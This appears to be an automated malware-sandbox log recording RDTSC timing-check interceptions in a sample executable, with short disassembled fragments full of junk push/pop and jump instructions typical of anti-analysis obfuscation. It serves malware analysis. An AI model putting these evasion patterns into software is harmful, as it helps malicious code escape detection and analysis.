                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA935 second address: 3BA93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BAA8E second address: 3BAA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BD20F second address: 3BD213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BD213 second address: 3BD219 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3C2935 second address: 3C293A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3C2D29 second address: 3C2D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3C2D2D second address: 3C2D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 ja 00007F4688C929D6h 0x0000000f pop ebx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F4688C929D6h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 377816 second address: 37781C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37781C second address: 377845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4688C929DAh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929E6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 377845 second address: 37784B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3C32BC second address: 3C32F4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4688C929D6h 0x00000008 jng 00007F4688C929D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 jmp 00007F4688C929E6h 0x0000001d popad 0x0000001e jng 00007F4688C929F0h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3C32F4 second address: 3C3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 337B54 second address: 337B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3C672D second address: 3C673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ecx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3CBCF0 second address: 3CBCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3CBCF9 second address: 3CBCFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3CB23A second address: 3CB266 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4688C929EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4688C929DAh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3CB3A3 second address: 3CB3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3CB3A9 second address: 3CB3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3CB716 second address: 3CB71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D13DC second address: 3D141D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F4688C929FDh 0x0000000b jmp 00007F4688C929DEh 0x00000010 jmp 00007F4688C929E9h 0x00000015 pushad 0x00000016 jng 00007F4688C929D6h 0x0000001c jo 00007F4688C929D6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D1715 second address: 3D1719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D1719 second address: 3D1726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D1726 second address: 3D172E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D1F93 second address: 3D1FA3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4688C929D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D1FA3 second address: 3D1FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D1FA7 second address: 3D1FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D2306 second address: 3D230C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D230C second address: 3D239C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F4688C929E2h 0x0000000f jno 00007F4688C929D6h 0x00000015 jc 00007F4688C929D6h 0x0000001b push ecx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop ecx 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 jng 00007F4688C929D6h 0x0000002a jmp 00007F4688C929E2h 0x0000002f popad 0x00000030 js 00007F4688C929E7h 0x00000036 jmp 00007F4688C929DBh 0x0000003b je 00007F4688C929D6h 0x00000041 pushad 0x00000042 jmp 00007F4688C929E9h 0x00000047 jbe 00007F4688C929D6h 0x0000004d popad 0x0000004e push eax 0x0000004f push edx 0x00000050 jl 00007F4688C929D6h 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D239C second address: 3D23A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4688C1B766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D25D6 second address: 3D25DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D25DC second address: 3D25E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D287E second address: 3D2882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D2882 second address: 3D288A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D99F4 second address: 3D9A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4688C929D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D8B1D second address: 3D8B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F4688C1B766h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D8B2E second address: 3D8B38 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4688C929D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D8C95 second address: 3D8CBD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C1B778h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jbe 00007F4688C1B766h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D8CBD second address: 3D8CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D937A second address: 3D937E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D937E second address: 3D938C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D938C second address: 3D93A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jp 00007F4688C1B76Ch 0x0000000e jnp 00007F4688C1B766h 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D94F4 second address: 3D9500 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4688C929D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D9500 second address: 3D951A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B776h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D951A second address: 3D9531 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F4688C929D6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D9531 second address: 3D9560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B76Eh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D96E8 second address: 3D96F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4688C929D6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3DE358 second address: 3DE362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4688C1B766h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3DE362 second address: 3DE366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E533B second address: 3E5349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F4688C1B766h 0x0000000d pop edi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E565F second address: 3E5697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DDh 0x00000013 push ebx 0x00000014 jo 00007F4688C929D6h 0x0000001a jno 00007F4688C929D6h 0x00000020 pop ebx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E5697 second address: 3E569D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E569D second address: 3E56AB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E586A second address: 3E5874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E5A0A second address: 3E5A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E5A10 second address: 3E5A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E5CC0 second address: 3E5CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F4688C929E5h 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E5CDF second address: 3E5CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470734 second address: 5470738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470738 second address: 5470776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F46FA6DE98Ch 0x0000000e jmp 00007F4688C1B777h 0x00000013 mov ecx, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4688C1B775h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470776 second address: 54707E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4688C929E8h 0x00000015 adc ax, 87D8h 0x0000001a jmp 00007F4688C929DBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F4688C929E8h 0x00000026 sbb al, 00000038h 0x00000029 jmp 00007F4688C929DBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54707E4 second address: 5470813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B76Dh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470813 second address: 5470867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ror eax, cl 0x0000000c jmp 00007F4688C929E5h 0x00000011 leave 0x00000012 jmp 00007F4688C929DEh 0x00000017 retn 0004h 0x0000001a nop 0x0000001b mov esi, eax 0x0000001d lea eax, dword ptr [ebp-08h] 0x00000020 xor esi, dword ptr [001C2014h] 0x00000026 push eax 0x00000027 push eax 0x00000028 push eax 0x00000029 lea eax, dword ptr [ebp-10h] 0x0000002c push eax 0x0000002d call 00007F468DF8324Ch 0x00000032 push FFFFFFFEh 0x00000034 pushad 0x00000035 jmp 00007F4688C929DDh 0x0000003a popad 0x0000003b pop eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F4688C929DDh 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470867 second address: 5470890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C1B777h 0x00000008 pop esi 0x00000009 mov dh, 73h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ret 0x0000000f nop 0x00000010 push eax 0x00000011 call 00007F468DF0C017h 0x00000016 mov edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470890 second address: 5470894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470894 second address: 5470898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470898 second address: 547089E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 547089E second address: 54708B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C1B76Fh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54708B8 second address: 54708E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DDh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54708E7 second address: 54708ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54708ED second address: 54708F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54708F1 second address: 5470920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B773h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4688C1B770h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470920 second address: 5470924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470924 second address: 547092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 547092A second address: 547094B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DAh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 547094B second address: 547095A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54201A8 second address: 54201C1 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4688C929DFh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54201C1 second address: 54201D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov al, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, ebx 0x00000012 movsx edi, si 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54201D7 second address: 54201DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54201DD second address: 542020C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C1B775h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 542020C second address: 542026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4688C929E7h 0x00000009 and esi, 19F0DA2Eh 0x0000000f jmp 00007F4688C929E9h 0x00000014 popfd 0x00000015 call 00007F4688C929E0h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4688C929DDh 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 542026B second address: 542029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C1B778h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 542029F second address: 54202A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54202A3 second address: 54202A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54202A9 second address: 54202D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C929DCh 0x00000008 pop ecx 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test esi, esi 0x00000011 jmp 00007F4688C929DAh 0x00000016 je 00007F46FA7A0D20h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
